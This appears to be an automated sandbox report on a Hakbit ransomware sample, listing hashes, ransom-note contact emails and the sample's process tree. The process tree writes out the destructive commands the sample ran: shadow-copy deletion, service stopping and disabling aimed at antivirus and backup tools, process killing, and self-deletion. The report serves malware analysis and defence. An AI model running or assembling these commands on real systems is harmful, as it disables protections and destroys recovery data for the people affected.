Analysis
- max time kernel: 274s
- max time network: 277s
- platform: windows10_x64
- resource: win10
- submitted: 09-07-2020 21:28
- Static task: static1
- Behavioral task: behavioral1
- Sample: AVTK_Win_Sybari.exe
- Resource: win10
General
- Target: AVTK_Win_Sybari.exe
- Size: 62KB
- MD5: d5edd6b32296d1cee4829fb1499c8759
- SHA1: b7f33bd8aeb6cdd59cbf88802938c6efc0108829
- SHA256: b99e0b750b3815fec3b292ede3f94524c8bede7d158334295e096518e9cde0ad
- SHA512: 8f320e8461691572dbe21f7ae4d96f067e4d2fb228de8c9b3be5325d43905d637438fd5aaed14e603ef73bb79b47d20e650dfb4b27dad74140a703a629884bf5
Malware Config
Extracted
- Path: C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt
- Family: hakbit
- Emails: torsec1@secmail.pro, agarrard@protonmail.com
Signatures
- Opens file in notepad (likely ransom note) (1 IoC)
  Processes: 1668 notepad.exe
- Launches sc.exe
  sc.exe is a Windows utility to control services on the system.
- Modifies service (2 TTPs, 5 IoCs)
  Processes: vssvc.exe
  Registry keys created by vssvc.exe:
  - \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}
  - \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
  - \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
  - \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
  - \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
- Suspicious behavior: EnumeratesProcesses (2439 IoCs)
  Processes: 3904 AVTK_Win_Sybari.exe (the same process for every one of the 2439 IoCs)
- Runs net.exe
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Hakbit
  Ransomware which encrypts files using AES, first seen in November 2019.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: AVTK_Win_Sybari.exe, taskkill.exe, taskkill.exe, taskkill.exe, vssvc.exe
  Token enabled (PID process):
  - SeDebugPrivilege: 3904 AVTK_Win_Sybari.exe
  - SeDebugPrivilege: 3832 taskkill.exe
  - SeDebugPrivilege: 1852 taskkill.exe
  - SeDebugPrivilege: 344 taskkill.exe
  - SeBackupPrivilege: 2316 vssvc.exe
  - SeRestorePrivilege: 2316 vssvc.exe
  - SeAuditPrivilege: 2316 vssvc.exe
- Suspicious use of WriteProcessMemory (70 IoCs)
  Processes: AVTK_Win_Sybari.exe, net.exe, net.exe, net.exe, net.exe, net.exe
  Writes, as "source PID source process -> target PID target process" (each write is recorded twice in the log):
  - 3904 AVTK_Win_Sybari.exe -> 3876 net.exe
  - 3876 net.exe -> 3828 net1.exe
  - 3904 AVTK_Win_Sybari.exe -> 2564 net.exe
  - 2564 net.exe -> 2612 net1.exe
  - 3904 AVTK_Win_Sybari.exe -> 3284 net.exe
  - 3284 net.exe -> 3352 net1.exe
  - 3904 AVTK_Win_Sybari.exe -> 3428 net.exe
  - 3428 net.exe -> 1708 net1.exe
  - 3904 AVTK_Win_Sybari.exe -> 1552 net.exe
  - 1552 net.exe -> 364 net1.exe
  - 3904 AVTK_Win_Sybari.exe -> 1956 sc.exe
  - 3904 AVTK_Win_Sybari.exe -> 2904 sc.exe
  - 3904 AVTK_Win_Sybari.exe -> 796 sc.exe
  - 3904 AVTK_Win_Sybari.exe -> 752 sc.exe
  - 3904 AVTK_Win_Sybari.exe -> 3832 taskkill.exe
  - 3904 AVTK_Win_Sybari.exe -> 1852 taskkill.exe
  - 3904 AVTK_Win_Sybari.exe -> 344 taskkill.exe
  - 3904 AVTK_Win_Sybari.exe -> 3688 vssadmin.exe
  - 3904 AVTK_Win_Sybari.exe -> 748 vssadmin.exe
  - 3904 AVTK_Win_Sybari.exe -> 3756 vssadmin.exe
  - 3904 AVTK_Win_Sybari.exe -> 3456 vssadmin.exe
  - 3904 AVTK_Win_Sybari.exe -> 3724 vssadmin.exe
  - 3904 AVTK_Win_Sybari.exe -> 508 vssadmin.exe
  - 3904 AVTK_Win_Sybari.exe -> 256 vssadmin.exe
  - 3904 AVTK_Win_Sybari.exe -> 1752 vssadmin.exe
  - 3904 AVTK_Win_Sybari.exe -> 3896 vssadmin.exe
  - 3904 AVTK_Win_Sybari.exe -> 4004 vssadmin.exe
  - 3904 AVTK_Win_Sybari.exe -> 3448 vssadmin.exe
  - 3904 AVTK_Win_Sybari.exe -> 540 vssadmin.exe
  - 3904 AVTK_Win_Sybari.exe -> 3948 vssadmin.exe
  - 3904 AVTK_Win_Sybari.exe -> 252 vssadmin.exe
  - 3904 AVTK_Win_Sybari.exe -> 3784 arp.exe
- Kills process with taskkill (3 IoCs)
  Processes: 3832 taskkill.exe, 1852 taskkill.exe, 344 taskkill.exe
- Interacts with shadow copies (2 TTPs, 14 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes (all vssadmin.exe): 3896, 3448, 256, 3948, 3688, 3456, 3724, 1752, 4004, 748, 3756, 508, 540, 252
Processes
- C:\Users\Admin\AppData\Local\Temp\AVTK_Win_Sybari.exe
  cmd: "C:\Users\Admin\AppData\Local\Temp\AVTK_Win_Sybari.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- C:\Windows\SYSTEM32\net.exe
  cmd: "net.exe" stop avpsus /y
  - Suspicious use of WriteProcessMemory
- C:\Windows\system32\net1.exe
  cmd: C:\Windows\system32\net1 stop avpsus /y
- C:\Windows\SYSTEM32\net.exe
  cmd: "net.exe" stop McAfeeDLPAgentService /y
  - Suspicious use of WriteProcessMemory
- C:\Windows\system32\net1.exe
  cmd: C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
- C:\Windows\SYSTEM32\net.exe
  cmd: "net.exe" stop mfewc /y
  - Suspicious use of WriteProcessMemory
- C:\Windows\system32\net1.exe
  cmd: C:\Windows\system32\net1 stop mfewc /y
- C:\Windows\SYSTEM32\net.exe
  cmd: "net.exe" stop BMR Boot Service /y
  - Suspicious use of WriteProcessMemory
- C:\Windows\system32\net1.exe
  cmd: C:\Windows\system32\net1 stop BMR Boot Service /y
- C:\Windows\SYSTEM32\net.exe
  cmd: "net.exe" stop NetBackup BMR MTFTP Service /y
  - Suspicious use of WriteProcessMemory
- C:\Windows\system32\net1.exe
  cmd: C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
- C:\Windows\SYSTEM32\sc.exe
  cmd: "sc.exe" config SQLTELEMETRY start= disabled
- C:\Windows\SYSTEM32\sc.exe
  cmd: "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
- C:\Windows\SYSTEM32\sc.exe
  cmd: "sc.exe" config SQLWriter start= disabled
- C:\Windows\SYSTEM32\sc.exe
  cmd: "sc.exe" config SstpSvc start= disabled
- C:\Windows\SYSTEM32\taskkill.exe
  cmd: "taskkill.exe" /IM mspub.exe /F
  - Suspicious use of AdjustPrivilegeToken
  - Kills process with taskkill
- C:\Windows\SYSTEM32\taskkill.exe
  cmd: "taskkill.exe" /IM mydesktopqos.exe /F
  - Suspicious use of AdjustPrivilegeToken
  - Kills process with taskkill
- C:\Windows\SYSTEM32\taskkill.exe
  cmd: "taskkill.exe" /IM mydesktopservice.exe /F
  - Suspicious use of AdjustPrivilegeToken
  - Kills process with taskkill
- C:\Windows\SYSTEM32\vssadmin.exe
  cmd: "vssadmin.exe" Delete Shadows /all /quiet
  - Interacts with shadow copies
- C:\Windows\SYSTEM32\vssadmin.exe
  cmd: "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  - Interacts with shadow copies
- C:\Windows\SYSTEM32\vssadmin.exe
  cmd: "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  - Interacts with shadow copies
- C:\Windows\SYSTEM32\vssadmin.exe
  cmd: "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  - Interacts with shadow copies
- C:\Windows\SYSTEM32\vssadmin.exe
  cmd: "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  - Interacts with shadow copies
- C:\Windows\SYSTEM32\vssadmin.exe
  cmd: "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  - Interacts with shadow copies
- C:\Windows\SYSTEM32\vssadmin.exe
  cmd: "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  - Interacts with shadow copies
- C:\Windows\SYSTEM32\vssadmin.exe
  cmd: "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  - Interacts with shadow copies
- C:\Windows\SYSTEM32\vssadmin.exe
  cmd: "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  - Interacts with shadow copies
- C:\Windows\SYSTEM32\vssadmin.exe
  cmd: "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  - Interacts with shadow copies
- C:\Windows\SYSTEM32\vssadmin.exe
  cmd: "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  - Interacts with shadow copies
- C:\Windows\SYSTEM32\vssadmin.exe
  cmd: "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  - Interacts with shadow copies
- C:\Windows\SYSTEM32\vssadmin.exe
  cmd: "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  - Interacts with shadow copies
- C:\Windows\SYSTEM32\vssadmin.exe
  cmd: "vssadmin.exe" Delete Shadows /all /quiet
  - Interacts with shadow copies
- C:\Windows\SYSTEM32\arp.exe
  cmd: "arp" -a
- C:\Windows\System32\notepad.exe
  cmd: "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt
  - Opens file in notepad (likely ransom note)
- C:\Windows\System32\cmd.exe
  cmd: "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\AVTK_Win_Sybari.exe
- C:\Windows\system32\choice.exe
  cmd: choice /C Y /N /D Y /T 3
- C:\Windows\system32\vssvc.exe
  cmd: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
Downloads
- C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt